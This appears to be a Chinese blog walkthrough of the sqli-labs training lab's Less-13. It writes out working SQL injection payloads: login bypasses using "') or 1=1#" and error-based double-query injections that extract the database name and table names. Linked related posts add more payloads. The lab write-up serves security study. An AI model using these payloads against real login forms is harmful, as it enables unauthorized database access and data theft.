sqli-labs练习(十三)--- POST-Double Injection-Single quotes-String-with twist

最新推荐文章于 2022-10-31 20:58:28 发布
最新推荐文章于 2022-10-31 20:58:28 发布
阅读量307 收藏 1
点赞数
分类专栏: web安全 sql注入 文章标签: sqli-labs 基于报错的注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34444097/article/details/81211524
版权

这里写图片描述

payload:uname=123 or 1=1#&passwd=111&submit=Submit,登录失败

payload:uname=123' or 1=1#&passwd=111&submit=Submit
报错You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
这里写图片描述

发现是单引号出错,
payload:uname=123" or 1=1#&passwd=111&submit=Submit,没报错,但是登录失败

payload:uname=123' or 1=1&passwd=111&submit=Submit,报错,并且出现了后台sql语句,
这里写图片描述
有错误信息可以看到,是单引号的变形
payload:uname=123') or 1=1#&passwd=111&submit=Submit,成功登录。

暴库,,,
从页面的回馈情况来看,要么给与我们报错信息,要么是登录成功。这种情况有没有觉得似曾相识的情况,在第五关中,我们就是用报错信息得到了数据库中的信息。
这里贴个连接:https://blog.csdn.net/qq_34444097/article/details/79982133

payload:uname=123') union select count(*),concat(':',(select database()),':',floor(rand()*2))as a from information_schema.tables group by a#&passwd=111&submit=Submit,利用报错信息得到数据库名security
这里写图片描述

payload:uname=123') union select count(*),concat('/',(select group_concat(table_name) from information_schema.tables where table_schema='security'),'/',floor(rand()*2))as a from information_schema.tables group by a#&passwd=111&submit=Submit
获取到表名/emails,referers,uagents,users
这里写图片描述

OK,这一关的方法就到这里了,想要得到数据库中的完整信息,可以参考前面关卡的博文。

wkend
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-lab教程——Less-13 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)
luosaierdadi的博客
07-09 781
通过报错可知 是通过') 闭合的发现没有登入成功返回信息 ,看来是要盲注了。方法一,报错型既然它返回错误信息了,说明有回显,可以报错注入。样例payloaduname=admin') and extractvalue(1,concat(0x7e,(select database()))) and (' 在concat()中构造查询语句,完事,和less-12以及之前的报错注入一样,不再赘述。方法二,时间型盲注因为可以报错注入,这个方法没有回显,就有点鸡肋了,给个样例payload:uname=admi
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sqli-labs练习(十四)--- POST-Double Injection-Single quotes-String-with twist
wkend的博客
07-26 439
这一关与上一关很相似,唯一的区别就在于是采用双引号来闭合的, 直接可以用万能密码成功登录,比如123" or 1=1# 在获取数据库信息是把')替换为"即可。 payload:uname=123" union select count(*),concat(':',(select database()),':',floor(rand()*2))as a from information_s...
sqli-labs less 13 POST -Double injection -Single quotes -String -with twist
Monster1m的博客
01-19 127
13关的话也没有什么特殊的,和十二关的顺序啊payload啊一模一样,不过13关的闭合方式是’),所以直接参考12就好了 12链接: https://blog.csdn.net/Monster1m/article/details/112850142
SQLi-Labs】Less-5 GET - Double Injection - Single Quotes - String
xw1995115的博客
11-15 493
本节练习涉及到了一个新的概念:双注入。 双注入简单理解为一个select查询里嵌套一个select查询,如果要利用双注入需要人为构造特定的能够造成报错的查询,从而在报错信息里返回我们需要的数据。需要用到的函数和语句有: 1.concat() 作用为连接括号里的参数。例concat(1,~,2) 结果为 1~2 2.floor() 作用为对括号里的非整数进行取整 如1.9取为1,2.1取为2 3.count() 作用为针对查询结果条数进行计数 4.rand() 作用为生成0-1范围内的随机数...
SQL注入攻击】GET-Double Injection-Single Quotes-String(双注入GET单引号字符型注入
sm1918451478的博客
10-31 454
SQL注入攻击】GET-Double Injection-Single Quotes-String(双注入GET单引号字符型注入
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据关卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
sqli-labs.rar
12-22
sqli-labs是一个专门设计用于学习和练习SQL注入技术的平台,特别适合初学者了解和提升SQL注入防御技能。 首先,要搭建sqli-labs,你需要准备以下工具: 1. PHPstudy:一个集成的Web服务器环境,包括Apache、Nginx、...
sqli-labs实验指导手册
最新发布
11-17
sqli-labs是一个专门设计的实验平台,用于教育和实践SQL注入技术。以下是对sqli-labs实验指导手册中涉及的SQL注入知识点的详细说明: 1. **字符型联合注入**(如less-1): - **注入点检测**:通过修改查询参数...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
sqli-labs练习(十二)--- POST-Error Based-Double quotes-String-with twist
wkend的博客
07-25 310
通过万能密码发现是双引号的变形, 这里直接上payload,就不再讲测试的过程了, 爆数据库名和版本 uname=123") union select database(),version()#&passwd=Dumb&submit=Submit 其余操作请参考前面几关,大同小异。...
Sqli-labs Less-3 Error Based- String (with Twist)
04-15 286
首先还是看网页提示输入id测试,输入id后加单引号看有什么输出。 payload /sql/Less-3/?id=1' 可以看到报错报错在1后面有一个括号,换一个payload试一下。 payload /sql/Less-3/?id=1') --+ 可以看到可以正常显示内容。 接下来确定回显位置。 /sql/Less-3/?id=-1') union select 1,2,3--+ 可以看到回显位置为2和3的位置,这里要注意id要设置为-1才能够看到回显位置,因为id为-1
sqli-labs】 less13 POST - Double Injection - Single quotes- String -twist (POST型单引号变形双注入)...
ajxi63204的博客
01-20 136
报错 闭合掉括号 这关登录成功之后不显示登录的用户名密码了 转载于:https://www.cnblogs.com/omnis/p/8319611.html
sqli-labs通关-------05lesson-double_injection_single_quotes(盲注)
枯藤闲画云
05-31 215
一进来让我们数据id 然后??? 到这来我们解释一下名词 http://www.91ri.org/7636.html 介绍一下双查询注入,什么叫双查询注入,这个有点难以解释,通俗的来说就是嵌套子查询。我们理解一下子查询,查询的关键字是select,这个大家都知道。子查询可以简单的理解在一个select语句里还有一个select,里面的这个select语句就是子查询。 这种方法...
SQLi-Labs靶场安装教程:PHPStudy与MySQL配置
"sqli-labs-master靶场安装下载" 本文将详细介绍如何在本地环境中安装和配置sqli-labs靶场,该靶场用于学习和实践SQL注入攻击的防御技巧。sqli-labs是一个非常实用的在线安全训练平台,适合初学者熟悉SQL注入漏洞的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值